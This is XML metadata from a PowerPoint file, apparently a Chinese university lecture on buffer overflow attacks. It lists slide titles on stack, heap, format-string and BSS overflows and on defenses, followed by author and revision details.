      <vt:lpstr>缓冲区溢出攻击原理</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击原理</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击原理</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击分类</vt:lpstr>
      <vt:lpstr>一、堆栈溢出</vt:lpstr>
      <vt:lpstr>多用户权限</vt:lpstr>
      <vt:lpstr>进程的识别号(ID)</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>缓冲区溢出</vt:lpstr>
      <vt:lpstr>缓冲区溢出</vt:lpstr>
      <vt:lpstr>缓冲区溢出-堆栈的作用</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>C语言函数调用例子</vt:lpstr>
      <vt:lpstr>C语言函数调用过程</vt:lpstr>
      <vt:lpstr>C语言函数调用过程</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击的原理</vt:lpstr>
      <vt:lpstr>基于堆栈的溢出</vt:lpstr>
      <vt:lpstr>基于堆栈的溢出</vt:lpstr>
      <vt:lpstr>一个例子</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>基于堆的溢出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格式化字符串攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>关于printf调用的堆栈情况</vt:lpstr>
      <vt:lpstr>Printf工作原理</vt:lpstr>
      <vt:lpstr>格式化字符串的漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>读取任意存贮地址的内容</vt:lpstr>
      <vt:lpstr>向任意存储地址写入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>漏洞利用</vt:lpstr>
      <vt:lpstr>三、BSS段溢出</vt:lpstr>
      <vt:lpstr>BSS溢出</vt:lpstr>
      <vt:lpstr>内容提要</vt:lpstr>
      <vt:lpstr>防御策略</vt:lpstr>
      <vt:lpstr>1、关闭不需要的特权程序</vt:lpstr>
      <vt:lpstr>2、及时给程序漏洞打补丁</vt:lpstr>
      <vt:lpstr>3、编写正确的代码</vt:lpstr>
      <vt:lpstr>4、非执行的缓冲区</vt:lpstr>
      <vt:lpstr>5、数组边界检查</vt:lpstr>
      <vt:lpstr>6、指针完整性检查</vt:lpstr>
      <vt:lpstr>7、其它防御方法</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击防御技术</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击防御技术</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击防御技术</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击防御技术</vt:lpstr>
      <vt:lpstr>缓冲区溢出攻击防御技术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wang_yan@hit.edu.cn</cp:lastModifiedBy>
  <cp:revision>1535</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2004-07-10T13:16:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-22T02:00:09Z</dcterms:modified>
</cp:coreProperties>
</file>